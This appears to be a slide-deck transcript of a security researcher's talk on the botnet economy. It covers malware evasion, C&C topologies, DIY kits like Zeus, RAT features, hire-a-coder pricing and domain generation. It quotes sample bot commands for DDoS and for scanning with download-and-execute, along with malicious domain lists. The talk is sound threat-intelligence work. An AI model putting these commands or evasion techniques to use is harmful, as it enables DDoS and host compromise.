Your computer is worth 30 cents - Gunter Ollmann

Your Computer Is Worth 30¢

This battle for control of your

Gunter Ollmann, Vice President of Research

Copyright © 2009-2010 Damballa, Inc. All Rights Reserved

About

Gunter Ollmann• VP of Research, Damballa Inc.

Damballa Inc.• Atlanta based security company focused on

enterprise detection and mitigation of botnets

Brief Bio:• Been in IT industry for two decades Built and run international

pentest teams, R&D groups and consulting practices around the world.

• Formerly Chief Security Strategist for IBM, Director of X-Force for ISS, Professional Services Director for NGS Software, Head of Attack Services EMEA, etc.

•• http://blog.damballa.com & http://technicalinfodotnet.blogspot.com/

http://blog.damballa.com/

http://technicalinfodotnet.blogspot.com/


Perspective…


Targeted?

Targeted in what sense?


Targeted Attacks?


Access to the enterprise

Submit a CV

Hand out USB drives

Purchase from botnet

masters

2000 2005 2009


Different Ways of Looking at the Threat?


Serial Variants

Code MetamorphismRandom changes to the codes structures and procedures.

Noise InsertionInsertion of noise instructions and whitespace commands.

CompilersDifferent compilers (and versions) are used to generate different code.

Original MalwareSource-code or DIY malware creator kit generates original code.

Noise Insertion


Cryptors, Packers and Binders

Original MalwareSource-code or DIY malware creator kit generates original code.

BindersTake the malware and bind it with(in) other innocuous software.

CryptorsEncrypt the malware, so it can only be decrypted in real-time on the host.

PackersCompress the malware to make it small, compact and random

QAAutomatically run the new malware through AV detection tests.


Avoiding analysis systems


Virus Testing


Bot spreading & Support


Command & Control Evolution

Star TopologyCommon clustering

Hierarchical TopologyEasy to sell/rent branches

Multi-server TopologyHigh resilience to shut-down

RandomP2P, etc.


Botnet Command and Control

IRC Command and Control is still common for botnet management

Command language varies upon nature of botnet capabilities

Sample bot command sequence

Sdbot/Reptile

1: .udp 208.43.216.195 1995 999999999999 –s

2: .ddos.ack 208.43.216.195 1995 9999999999999 –s

…typically used for DDoS

Rbots

1: scan.start ms08_067_netapi 25 3 download+exec x.x.x.x

2: .scan 75 1 201.x.x.x 2 1 201.x.x.x

3: .root.start lsass_445 100 3 0 -r –s

…scan hosts within a Class-A for port 443 and attempt to exploit (Conflcker)


IRC CnC Host Controls

SpyBot

SDbot

Agobot


Zeus & Distribution

1

2

3

ZEUS DIY Kit• RRP: $400 (street price ~$50)• Botnet CnC package with Web management frontend.• Very popular – many plug-ins developed to extend functionality


Sophisticated Management


Visibility…


1

2


Keylogger Octopus

Basic DIY kit

• Evolution of free kit (incl. source code)

$30 for commercial version

1

2

3


RAT Spy-Net v1.8

1

43

2


RAT Aero-Rat v0.3

2

3

1


RAT Turkojan v4

-Trojan creator

V.4 New features• Remote Desktop

• Webcam Streaming

• Audio Streaming

• Remote passwords

• MSN Sniffer

• Remote Shell

• Advanced File Manager

• Online & Offline keylogger

• Information about remote computer

• Etc..

Three versions• Gold, Silver & Bronze

2

1


RAT PayDay v0.11

6

7

54

3

2


Hire-a-Malware-Coder (Custom Build)

Platform: software running on MAC OS to WindowsMultitasking: have the capacity to work on multiple projectsSpeed and responsibility: at the highest levelPre-payment for new customers: 50% of the whole price, 30% pre-pay ofthe whole price for repeated customers

Rates: starting from 100 euros

I can also offer you another deal, I will share the complete source code inexchange to access to a botnet with at least 4000 infected hosts becauseI don't have time to play around with me bot right now.


Hire-a-malware-coder Pricing

Other models exist for hire-a-malware-coder pricing

Component/functionality based pricing

• Loader 300

• FTP & Grabber 150

• Assembler Spam bases 220

• Socks 4/5 70

• Botnet manager 600

• Scripts 70

• Password stealers (IE, MSN, etc.) 70

• AV-remover 70

• Screen-grabber 70


Competition…


Builder Battling

Zeus Worlds most popular malware DIY malware construction kit

Helps clear your system before making the malware


Battling at the Victims Host

Similar kit to Zeus


Dynamic Domain Generation

Designed to thwart domain hijacking/closure

Sinowalfhwwhkis.comfhksvbjj.comkixxgxhi.comdfhkxefj.bizxchtucfx.comehbcihsg.comhtiukhwb.comxddjsvgh.comivfjxxgf.comicdkvcjf.com

Bobax/Torpigcfzxkefy.2mydns.netozzlcjfwxy.mykgb.comuavpmphb.zipitover.comnltngl.widescreenhd.tvmohuajixthb.afraid.orgvemogoftiv.zipitover.comfwsdqcxozwi.mycoding.comiaguaku.afraid.orgpxkakigmdx.mario.orgzxeytdqgn.mario.org

Conficker A/Bjstlzaccs.cckupgc.infogyagluso.infoezffoozq.bizhxqbgkyw.orgnxmezijg.infosayklyqfhk.orgeplgu.orghlgkiyogcgs.wsoyvtk.cn

Conficker Cbjxqjh.com.svdgtqwe.becnxnp.com.pybtuutlevt.com.mtbmjlezym.com.pebynzomen.com.mxdaagsup.com.bocequxn.cacxcsicbqn.chdcmrfv.gs


Blacklisted Researchers


Hack-back

Curiosity killed the cat• Turn botnet against CnC investigators

Identifying the researcher• Repeated lookup of name servers• Resolution request for CnC host name• Wrong port/protocol in CnC connection• Missing handshake or keys• Identify sandbox/VM being used

Response tactics• DDoS the IP address or netblock• Spam flood the researcher• Exploit and breakout of sandbox/VM• Give different (benign) responses to the researcher


Value…


How to pay

Where to look

Mechanisms for validation of buyer/seller


Making Money With Botnets

Business Motivators for Bot Masters

• Active market for purchase/sell of corporate hosts• $500-$20,000 per host

•

• Markets for the data stolen from botnet hosts• Authentication credentials and PII

• Buy/Selling stolen documents

• blackhat• Noisy, high-volume, low profit Spam, DDoS, brute-force

• Stealthy click-fraud, corporate identity enumeration

• Reputation hijacking• Running blackhat services that leverage corporate reputation


Buying Botnet Victims


Worth less than you imagine

How much?1/400th of a cent per 24 hours


Value-added Services


iFrame Traffic


URL Management


Lookup Resilience

IP Flux• Single-flux

•

• Double-flux•

Domain Flux• Domain wildcarding

•

• Domain generation algorithms•


Umm…


Conclusions


Gunter Ollmann - VP of [email protected]

WWW – http://www.damballa.comBlog - http://blog.damballa.comBlog - http://technicalinfodotnet.blogspot.com

Thank You!

mailto:[email protected]

Your computer is worth 30 cents - Gunter Ollmann

Technology

Transcript of Your computer is worth 30 cents - Gunter Ollmann